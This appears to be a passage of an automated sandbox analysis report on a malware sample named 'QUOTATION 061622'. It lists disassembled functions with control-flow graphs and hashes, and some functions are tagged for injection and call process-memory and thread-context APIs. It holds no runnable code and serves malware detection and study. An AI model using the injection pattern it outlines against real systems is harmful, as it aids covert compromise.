                                                          • Instruction Fuzzy Hash: A6F0F626B0E7911FDB6F0768A8240662BE21FC751431E82FFC881CF286EA215C428393
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0281EDF1 Relevance: 2.1, Strings: 1, Instructions: 835COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4317 281edf1-281ee43 4318 281ee48-281ee75 call 4d905ac 4317->4318 4320 281ee7a-281ef27 4318->4320 4332 281ef2e-281ef51 4320->4332 4484 281ef54 call 4d90b88 4332->4484 4485 281ef54 call 4d90b6c 4332->4485 4333 281ef56-281ef82 4335 281ef87-281f136 4333->4335 4356 281f138 4335->4356 4357 281f13b-281f14d 4335->4357 4356->4357 4359 281f152-281f176 4357->4359 4361 281f17b-281f1a9 4359->4361 4364 281f1b9 4361->4364 4365 281f1ab-281f1b7 4361->4365 4366 281f1bb-281f1d0 4364->4366 4365->4366 4369 281f1d7-281f1d9 4366->4369 4370 281f1e3-281f756 4369->4370 4439 281f75d-281f786 4370->4439 4482 281f789 call 4d90e18 4439->4482 4483 281f789 call 4d90dfc 4439->4483 4440 281f78b-281f79f 4441 281f7a4-281f902 4440->4441 4459 281f909-281f938 4441->4459 4460 281f93d-281f949 4459->4460 4461 281f94e-281f962 4460->4461 4462 281f967-281f981 4461->4462 4463 281f983 4462->4463 4464 281f986-281fa4a 4462->4464 4463->4464 4474 281fa51 4464->4474 4475 281fa4c-281fa4f 4464->4475 4476 281fa53-281fab1 4474->4476 4475->4476 4482->4440 4483->4440 4484->4333 4485->4333
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,H8m
                                                          • API String ID: 0-2444604156
                                                          • Opcode ID: cd29c249c891c082768e5d4f45b918e857adf4285d205673d4d30efd2abdff42
                                                          • Instruction ID: ff59ae4639ec1d814d062b3e4243e247b803f16e5ba089e93a7d2d2d36aa32b9
                                                          • Opcode Fuzzy Hash: cd29c249c891c082768e5d4f45b918e857adf4285d205673d4d30efd2abdff42
                                                          • Instruction Fuzzy Hash: C7726834E442188FCB04EF78D8A5BADB7B6FF88304F1089A9D549A3394DB35AD95CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0281EE00 Relevance: 2.1, Strings: 1, Instructions: 830COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4487 281ee00-281ef51 call 4d905ac 4654 281ef54 call 4d90b88 4487->4654 4655 281ef54 call 4d90b6c 4487->4655 4503 281ef56-281f136 4526 281f138 4503->4526 4527 281f13b-281f1a9 4503->4527 4526->4527 4534 281f1b9 4527->4534 4535 281f1ab-281f1b7 4527->4535 4536 281f1bb-281f786 4534->4536 4535->4536 4652 281f789 call 4d90e18 4536->4652 4653 281f789 call 4d90dfc 4536->4653 4610 281f78b-281f962 4632 281f967-281f981 4610->4632 4633 281f983 4632->4633 4634 281f986-281fa4a 4632->4634 4633->4634 4644 281fa51 4634->4644 4645 281fa4c-281fa4f 4634->4645 4646 281fa53-281fab1 4644->4646 4645->4646 4652->4610 4653->4610 4654->4503 4655->4503
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481785655.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2810000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,H8m
                                                          • API String ID: 0-2444604156
                                                          • Opcode ID: a28511a1aa877547d1cefef068099c831a0bb14ae5d1209ff42f2ed0556da79b
                                                          • Instruction ID: 077f930db9f606e7fc7938736e19b2c5811fcbb542622b905683a82cef345268
                                                          • Opcode Fuzzy Hash: a28511a1aa877547d1cefef068099c831a0bb14ae5d1209ff42f2ed0556da79b
                                                          • Instruction Fuzzy Hash: 4E725834E44218CFCB04EF78D8A5BADB7B6FB88304F1089A9D549A3394DB35AD95CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B0F5 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4954 4e2b0f5-4e2b199 4956 4e2b19b-4e2b1c0 4954->4956 4957 4e2b1ed-4e2b20d 4954->4957 4956->4957 4960 4e2b1c2-4e2b1c4 4956->4960 4961 4e2b261-4e2b292 4957->4961 4962 4e2b20f-4e2b234 4957->4962 4963 4e2b1c6-4e2b1d0 4960->4963 4964 4e2b1e7-4e2b1ea 4960->4964 4970 4e2b294-4e2b2bc 4961->4970 4971 4e2b2e9-4e2b3a3 CreateProcessAsUserA 4961->4971 4962->4961 4972 4e2b236-4e2b238 4962->4972 4965 4e2b1d2 4963->4965 4966 4e2b1d4-4e2b1e3 4963->4966 4964->4957 4965->4966 4966->4966 4969 4e2b1e5 4966->4969 4969->4964 4970->4971 4980 4e2b2be-4e2b2c0 4970->4980 4984 4e2b3a5-4e2b3ab 4971->4984 4985 4e2b3ac-4e2b420 4971->4985 4973 4e2b23a-4e2b244 4972->4973 4974 4e2b25b-4e2b25e 4972->4974 4977 4e2b246 4973->4977 4978 4e2b248-4e2b257 4973->4978 4974->4961 4977->4978 4978->4978 4979 4e2b259 4978->4979 4979->4974 4982 4e2b2c2-4e2b2cc 4980->4982 4983 4e2b2e3-4e2b2e6 4980->4983 4986 4e2b2d0-4e2b2df 4982->4986 4987 4e2b2ce 4982->4987 4983->4971 4984->4985 4996 4e2b422-4e2b426 4985->4996 4997 4e2b430-4e2b434 4985->4997 4986->4986 4988 4e2b2e1 4986->4988 4987->4986 4988->4983 4996->4997 4998 4e2b428 4996->4998 4999 4e2b436-4e2b43a 4997->4999 5000 4e2b444-4e2b448 4997->5000 4998->4997 4999->5000 5001 4e2b43c 4999->5001 5002 4e2b44a-4e2b44e 5000->5002 5003 4e2b458-4e2b45c 5000->5003 5001->5000 5002->5003 5004 4e2b450 5002->5004 5005 4e2b46e-4e2b475 5003->5005 5006 4e2b45e-4e2b464 5003->5006 5004->5003 5007 4e2b477-4e2b486 5005->5007 5008 4e2b48c 5005->5008 5006->5005 5007->5008 5010 4e2b48d 5008->5010 5010->5010
                                                          APIs
                                                          • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 04E2B390
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: f0639332fb92665fec992c5e97cf7b284f1c4864132ef9434aa47f5d0dd1f0af
                                                          • Instruction ID: a9582268cc6cf49eb0dd5cc49d111004c87d34c1130abfa48a133a915d0183a9
                                                          • Opcode Fuzzy Hash: f0639332fb92665fec992c5e97cf7b284f1c4864132ef9434aa47f5d0dd1f0af
                                                          • Instruction Fuzzy Hash: E2A15A71D002299FDB14CFA9C9817EDBBB2FF48308F048569E818E7291DB74A985CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B6F0 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E2B785
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 3046204ce9e4a640592366c9d3a81250e446a53a6471876eb80fbd8810d66238
                                                          • Instruction ID: e65506815d336c9a9e27dc4eb15c1dcb50f8ac518b1c8e0400b404ba5c9584f9
                                                          • Opcode Fuzzy Hash: 3046204ce9e4a640592366c9d3a81250e446a53a6471876eb80fbd8810d66238
                                                          • Instruction Fuzzy Hash: 6021FFB5900259DFCB10CF9AC885BDEBBF4FF48324F00852AE919A3340D778A954CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B6F8 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E2B785
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 1114c61b4799a32e5f9c5a6883a55f95623b5812ead4bf33fc33057b340d1f1c
                                                          • Instruction ID: aadda1c4930a94830e7d9207484af366b45da7e3ac02f9173c0b103de06de8f5
                                                          • Opcode Fuzzy Hash: 1114c61b4799a32e5f9c5a6883a55f95623b5812ead4bf33fc33057b340d1f1c
                                                          • Instruction Fuzzy Hash: CF21E0B5900259DFCB10CF9AC985BDEBBF4FF48324F10852AE919A3250D778A944CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B4C9 Relevance: 1.6, APIs: 1, Instructions: 60threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04E2B547
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: c5d8b777508511aabce0c31076a50ba89ad9d506db0b824f51949dd2e3555201
                                                          • Instruction ID: 68053ae71c9964af31d32f1eff903b60467333cba83561f7ce7f7cfefcd5e820
                                                          • Opcode Fuzzy Hash: c5d8b777508511aabce0c31076a50ba89ad9d506db0b824f51949dd2e3555201
                                                          • Instruction Fuzzy Hash: 9C2129B1D0061A9FCB10CF9AC5857DEFBF4FB09324F448129E418A7240D778A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B4D0 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04E2B547
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: 9ca1aa4a1206e46521ecbf23acd0d4a73bf37ca8e0092b68066c2e3b4c7870c4
                                                          • Instruction ID: a295e33a11398f3d6bd640e0fa71aebecf052f923a3137b57ce1a3b539741492
                                                          • Opcode Fuzzy Hash: 9ca1aa4a1206e46521ecbf23acd0d4a73bf37ca8e0092b68066c2e3b4c7870c4
                                                          • Instruction Fuzzy Hash: E32108B1D0061A9FCB10CF9AC5857EEFBF4BB49324F54812AD418B7640D778A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B589 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E2B606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 9334e44e282b3c509e9bbf9ce7da88547e8df6216375ab74648d239e24315a93
                                                          • Instruction ID: 08dc12c1ba262e000697128101a310c52ff6b0b2976a0c22f9d283d13964bf86
                                                          • Opcode Fuzzy Hash: 9334e44e282b3c509e9bbf9ce7da88547e8df6216375ab74648d239e24315a93
                                                          • Instruction Fuzzy Hash: F62106B5D00259DFCB10CF9AC884BDEBBF4FB48324F148429E968A7250D378A644CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B590 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E2B606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: 456842629b0f65e440649f0f8bff0b4e3d9addbd23265114d2c1834e4fddbe33
                                                          • Instruction ID: cf09c412b3205a1a96c7ea3095e3f0a33f9f68db8fec726e8f6d90241e85b812
                                                          • Opcode Fuzzy Hash: 456842629b0f65e440649f0f8bff0b4e3d9addbd23265114d2c1834e4fddbe33
                                                          • Instruction Fuzzy Hash: A72106B1D00249DFCB10CF9AC884BDEBBF4FB48324F148429E918A7250D374A644CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B649 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E2B6BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c2645d3700446cd8a2df913d621c8feab35e378aa9c771de4f11854ff0b3a28c
                                                          • Instruction ID: bb90694393eab379c943950a8573d88e28186cf1bfe702457c67646dfac2869e
                                                          • Opcode Fuzzy Hash: c2645d3700446cd8a2df913d621c8feab35e378aa9c771de4f11854ff0b3a28c
                                                          • Instruction Fuzzy Hash: DD1113B5900259DFCF10CF99C884BDEBBF8FB48324F148419E929A7210C375A554CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B650 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E2B6BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: a49fd69be9288dcfa19d09540ca36fb40c00dbe00f1004eb9052b7c997a13d00
                                                          • Instruction ID: aa91c0025baa3d508c922ad5ce20c53c8d4cce4b45025162311fe0bb7b31c5d2
                                                          • Opcode Fuzzy Hash: a49fd69be9288dcfa19d09540ca36fb40c00dbe00f1004eb9052b7c997a13d00
                                                          • Instruction Fuzzy Hash: 3711F5B5900659DFCB10CF99C884BDFBBF8FB48324F148419E529A7610C375A554CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B7C8 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 6d77358a62b7e6c011e301e2fef4c4b110cf5fde5bd6ec78cbc0be66a47304aa
                                                          • Instruction ID: 959ab944cd128458fd6c0637dcaa3655be29c4cbe9b354c2437a04366811dffa
                                                          • Opcode Fuzzy Hash: 6d77358a62b7e6c011e301e2fef4c4b110cf5fde5bd6ec78cbc0be66a47304aa
                                                          • Instruction Fuzzy Hash: D11115B5800259CFDB10CF99D489BDEBBF8FB48324F148459D919A7740C775A584CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04E2B7D0 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482362677.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4e20000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 64a629514b963a6495289ba862fc37c313c804b3edc500411d6a6ba2907cba62
                                                          • Instruction ID: cf1c1169ed3436b4bfe7a066244fd71ac20a7d75a59682bd9039d73a0656f5e2
                                                          • Opcode Fuzzy Hash: 64a629514b963a6495289ba862fc37c313c804b3edc500411d6a6ba2907cba62
                                                          • Instruction Fuzzy Hash: 921112B1800259CFCB10CF99C488BDEBBF8FB48324F10846AD819A7200C775A944CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90E18 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c4b4a9f0d3ba32aafd38885430f2ca000078133cb76b78d67e5235431378e46
                                                          • Instruction ID: 3545c00e0a48d4cc8ac0ecd5182d9a5a2b5d5f2049d87a4ed9437b8e42eac745
                                                          • Opcode Fuzzy Hash: 6c4b4a9f0d3ba32aafd38885430f2ca000078133cb76b78d67e5235431378e46
                                                          • Instruction Fuzzy Hash: 2F21D43470020B9FDF2A8E94A840BAF37EBBBC8754F104429E9059B245CB31AC50D7A2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90DFC Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1636242ba8f1412737ec8aec2dc7b1ae40d13b94fadbce5c567a765b871bfdc0
                                                          • Instruction ID: 50c94fe01ed72080bab59b6c258aba8497ea4197109fabb06943441f0d38d03f
                                                          • Opcode Fuzzy Hash: 1636242ba8f1412737ec8aec2dc7b1ae40d13b94fadbce5c567a765b871bfdc0
                                                          • Instruction Fuzzy Hash: CE212471B09387DFEF238E50AC40BAA7BA6FF86710F14406AE940CA191D731AC51D762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D9108C Relevance: .1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8bfe3a290f5c686113d6583621f4ec15a556345aca8b8038535fde7abcbb3f3
                                                          • Instruction ID: 08e421a92f03ce0279fe0a5507f47609b83a2495b4feca6941f810fa0d171eab
                                                          • Opcode Fuzzy Hash: e8bfe3a290f5c686113d6583621f4ec15a556345aca8b8038535fde7abcbb3f3
                                                          • Instruction Fuzzy Hash: 7A11562570C3D24FDF2686A9A45116DBFE7BFC315430505ABC148CB257CF62BC028782
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D905AC Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e10ce8a70f50aaaeb69587df928312b083333950b598820e49b22050d464979b
                                                          • Instruction ID: eb4407af646c5841d8de85cc7e0c8d6def0972e1b62afef796b491f9b5ed8c4c
                                                          • Opcode Fuzzy Hash: e10ce8a70f50aaaeb69587df928312b083333950b598820e49b22050d464979b
                                                          • Instruction Fuzzy Hash: 5001712AA0E3D14FCB23476968355687FF59FC362030A40EFD485DB263DA559C46C762
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90A94 Relevance: .0, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ecbcafb3e4770f81c7966b349ffe88f9462b53fd6cda986c4bac3d2ea442f57
                                                          • Instruction ID: 61e6ec347be1a32b08cda9a554a3cca52ab51007a4c510ff4d830a428f695bcc
                                                          • Opcode Fuzzy Hash: 7ecbcafb3e4770f81c7966b349ffe88f9462b53fd6cda986c4bac3d2ea442f57
                                                          • Instruction Fuzzy Hash: 95012B2170E3C14FC71B87B9282116ABBE7AFC6114319C5BBC545C725BDE609C058392
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D900A8 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a410629273f4e16e4ea576bcb079645b046cc2bf85aa542d3534f05c50779876
                                                          • Instruction ID: ed9396320d062c0abb58b3f1200c6cc54960b2f4c4327ccebebca199aa804858
                                                          • Opcode Fuzzy Hash: a410629273f4e16e4ea576bcb079645b046cc2bf85aa542d3534f05c50779876
                                                          • Instruction Fuzzy Hash: D501DB357093816FDB234A19E821B667FF6AF83614F1980EBD684DF263DA619C01C391
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D903FC Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9d8cf44914a66d62476abf167c69fc2fcf09c5c261ccbe77a5e0e2258001f97
                                                          • Instruction ID: a1e65e2f07fe88e9259ce9b5bd1022b77fd5d5e2b5d27aeda78330d5dcae8a85
                                                          • Opcode Fuzzy Hash: c9d8cf44914a66d62476abf167c69fc2fcf09c5c261ccbe77a5e0e2258001f97
                                                          • Instruction Fuzzy Hash: 7A01D12274E3C08FCF2B4B7468201693BE26FC350930946EB8582CB257CA26AC43D752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D900C8 Relevance: .0, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ccee78a7d03722c7548cfdc829e5ef79b064701e4f95c33674f3a97d555c620f
                                                          • Instruction ID: 055f305cefc2a57126dacf4dd0f09a39d1daec3c2f578d8a142635f6d8863716
                                                          • Opcode Fuzzy Hash: ccee78a7d03722c7548cfdc829e5ef79b064701e4f95c33674f3a97d555c620f
                                                          • Instruction Fuzzy Hash: A3F0F639B006115FCB294A4DE821B7B72DBABC5658F24C03AEA45DF344DA71EC0143D2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90440 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00cf31228d00c58d987450a65e5cbb9bf2b207a395b526ecb318fabf07184fb9
                                                          • Instruction ID: 2c7ca8b179cec8e5020032304536a6e95e2ae868f06ffe0c216cb8ccbe86287c
                                                          • Opcode Fuzzy Hash: 00cf31228d00c58d987450a65e5cbb9bf2b207a395b526ecb318fabf07184fb9
                                                          • Instruction Fuzzy Hash: 0E018C6264F3C0AFDB079B705C250647FA0AE8300474E45EBC4C2CF5A3D92A9C4ADB23
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D91024 Relevance: .0, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91126239f01566584819cf7525a3b6e2fa4256a578f3d4848be09ce932169d03
                                                          • Instruction ID: b458d6ecd8afb2325e885393d266e41986827f656d2428ddff86df0c184a8b9f
                                                          • Opcode Fuzzy Hash: 91126239f01566584819cf7525a3b6e2fa4256a578f3d4848be09ce932169d03
                                                          • Instruction Fuzzy Hash: B9F0C82570E7D75FDB2647B8482517D7FE2AFC254030982EBC589CB1AADE626C05C393
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04D90B6C Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.482325593.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4d90000_QUOTATION 061622.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4588bd86b9d90f7b8b37ece4952eee9aa6f8b9dbaa12fdd0224e0b9128233faf
                                                          • Instruction ID: 019a77f44a7a2ec909d4b378537f60b544257728e56900cd07527b3996b1debd
                                                          • Opcode Fuzzy Hash: 4588bd86b9d90f7b8b37ece4952eee9aa6f8b9dbaa12fdd0224e0b9128233faf
                                                          • Instruction Fuzzy Hash: 95F0F636A096919FCB274A29A868865BFF1AFC266C30980EFD885CB527D7309C02C751
                                                          Uniqueness

